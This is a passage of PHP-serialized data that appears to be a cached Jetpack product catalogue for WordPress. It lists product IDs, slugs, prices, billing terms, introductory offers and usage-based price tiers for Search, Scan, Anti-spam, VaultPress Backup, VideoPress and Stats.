Search\";s:12:\"product_slug\";s:22:\"jetpack_search_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.95\";s:21:\"combined_cost_display\";s:6:\"$12.95\";s:4:\"cost\";d:12.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:1295;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:560;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:12:\"jetpack_scan\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2106;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:12:\"jetpack_scan\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:20:\"jetpack_scan_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2107;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:20:\"jetpack_scan_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_scan_realtime\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2108;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:21:\"jetpack_scan_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$500.00\";s:21:\"combined_cost_display\";s:4:\"$500\";s:4:\"cost\";i:500;s:18:\"cost_smallest_unit\";i:50000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$41.67\";}s:29:\"jetpack_scan_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2109;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:29:\"jetpack_scan_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$50.00\";s:21:\"combined_cost_display\";s:3:\"$50\";s:4:\"cost\";i:50;s:18:\"cost_smallest_unit\";i:5000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_anti_spam\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2110;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:17:\"jetpack_anti_spam\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_anti_spam_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2111;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:25:\"jetpack_anti_spam_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2112;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_backup_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2113;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t2_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2114;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$359.40\";s:21:\"combined_cost_display\";s:7:\"$359.40\";s:4:\"cost\";d:359.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:35940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$29.95\";}s:25:\"jetpack_backup_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2115;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:18:\"jetpack_videopress\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2116;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:18:\"jetpack_videopress\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:26:\"jetpack_videopress_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2117;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:26:\"jetpack_videopress_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"jetpack_videopress_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2119;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:28:\"jetpack_videopress_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:24:\"jetpack_backup_t0_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2120;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t0_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$35.88\";s:21:\"combined_cost_display\";s:6:\"$35.88\";s:4:\"cost\";d:35.88000000000000255795384873636066913604736328125;s:18:\"cost_smallest_unit\";i:3588;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$2.99\";}s:25:\"jetpack_backup_t0_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2121;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t0_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.99\";s:21:\"combined_cost_display\";s:5:\"$2.99\";s:4:\"cost\";d:2.9900000000000002131628207280300557613372802734375;s:18:\"cost_smallest_unit\";i:299;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_backup_t1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2123;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_backup_t1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:19:\"jetpack_search_free\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2130;s:12:\"product_name\";s:19:\"Jetpack Search Free\";s:12:\"product_slug\";s:19:\"jetpack_search_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:19:\"jetpack-search-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_search_bi_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2131;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:24:\"jetpack_search_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$160.00\";s:21:\"combined_cost_display\";s:4:\"$160\";s:4:\"cost\";i:160;s:18:\"cost_smallest_unit\";i:16000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:16000;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:560;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$6.67\";}s:23:\"jetpack_backup_one_time\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2201;s:12:\"product_name\";s:36:\"Jetpack VaultPress Backup (One-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_one_time\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-one-time\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.99\";s:21:\"combined_cost_display\";s:5:\"$0.99\";s:4:\"cost\";d:0.9899999999999999911182158029987476766109466552734375;s:18:\"cost_smallest_unit\";i:99;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_stats_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2219;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:20:\"jetpack_stats_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:6:{i:0;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";i:10000;s:13:\"minimum_price\";i:10000;s:13:\"maximum_price\";i:10000;s:21:\"minimum_price_display\";s:4:\"$100\";s:29:\"minimum_price_monthly_display\";s:5:\"$8.34\";s:21:\"maximum_price_display\";s:4:\"$100\";s:29:\"maximum_price_monthly_display\";s:5:\"$8.34\";}i:1;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:10001;s:13:\"maximum_units\";i:100000;s:13:\"minimum_price\";i:20000;s:13:\"maximum_price\";i:20000;s:21:\"minimum_price_display\";s:4:\"$200\";s:29:\"minimum_price_monthly_display\";s:6:\"$16.67\";s:21:\"maximum_price_display\";s:4:\"$200\";s:29:\"maximum_price_monthly_display\";s:6:\"$16.67\";}i:2;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:100001;s:13:\"maximum_units\";i:250000;s:13:\"minimum_price\";i:30000;s:13:\"maximum_price\";i:30000;s:21:\"minimum_price_display\";s:4:\"$300\";s:29:\"minimum_price_monthly_display\";s:3:\"$25\";s:21:\"maximum_price_display\";s:4:\"$300\";s:29:\"maximum_price_monthly_display\";s:3:\"$25\";}i:3;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:250001;s:13:\"maximum_units\";i:500000;s:13:\"minimum_price\";i:50000;s:13:\"maximum_price\";i:50000;s:21:\"minimum_price_display\";s:4:\"$500\";s:29:\"minimum_price_monthly_display\";s:6:\"$41.67\";s:21:\"maximum_price_display\";s:4:\"$500\";s:29:\"maximum_price_monthly_display\";s:6:\"$41.67\";}i:4;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:500001;s:13:\"maximum_units\";i:1000000;s:13:\"minimum_price\";i:70000;s:13:\"maximum_price\";i:70000;s:21:\"minimum_price_display\";s:4:\"$700\";s:29:\"minimum_price_monthly_display\";s:6:\"$58.34\";s:21:\"maximum_price_display\";s:4:\"$700\";s:29:\"maximum_price_monthly_display\";s:6:\"$58.34\";}i:5;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:1000001;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:95000;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:1000000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:45000;s:12:\"per_unit_fee\";i:25000;s:21:\"minimum_price_display\";s:4:\"$950\";s:29:\"minimum_price_monthly_display\";s:6:\"$79.17\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:10000;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:21:\"jetpack_stats_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2220;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:21:\"jetpack_stats_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.95\";s:21:\"combined_cost_display\";s:6:\"$12.95\";s:4:\"cost\";d:12.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:6:{i:0;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";i:10000;s:13:\"minimum_price\";i:1295;s:13:\"maximum_price\";i:1295;s:21:\"minimum_price_display\";s:6:\"$12.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$12.95\";s:21:\"maximum_price_display\";s:6:\"$12.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$12.95\";}i:1;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:10001;s:13:\"maximum_units\";i:100000;s:13:\"minimum_price\";i:2595;s:13:\"maximum_price\";i:2595;s:21:\"minimum_price_display\";s:6:\"$25.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$25.95\";s:21:\"maximum_price_display\";s:6:\"$25.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$25.95\";}i:2;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:100001;s:13:\"maximum_units\";i:250000;s:13:\"minimum_price\";i:3795;s:13:\"maximum_price\";i:3795;s:21:\"minimum_price_display\";s:6:\"$37.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$37.95\";s:21:\"maximum_price_display\";s:6:\"$37.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$37.95\";}i:3;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:250001;s:13:\"maximum_units\";i:500000;s:13:\"minimum_price\";i:6295;s:13:\"maximum_price\";i:6295;s:21:\"minimum_price_display\";s:6:\"$62.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$62.95\";s:21:\"maximum_price_display\";s:6:\"$62.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$62.95\";}i:4;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:500001;s:13:\"maximum_units\";i:1000000;s:13:\"minimum_price\";i:8795;s:13:\"maximum_price\";i:8795;s:21:\"minimum_price_display\";s:6:\"$87.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$87.95\";s:21:\"maximum_price_display\";s:6:\"$87.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$87.95\";}i:5;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:1000001;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:11990;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:1000000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:5600;s:12:\"per_unit_fee\";i:3195;s:21:\"minimum_price_display\";s:7:\"$119.90\";s:29:\"minimum_price_monthly_display\";s:7:\"$119.90\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:10000;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_stats_free_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2221;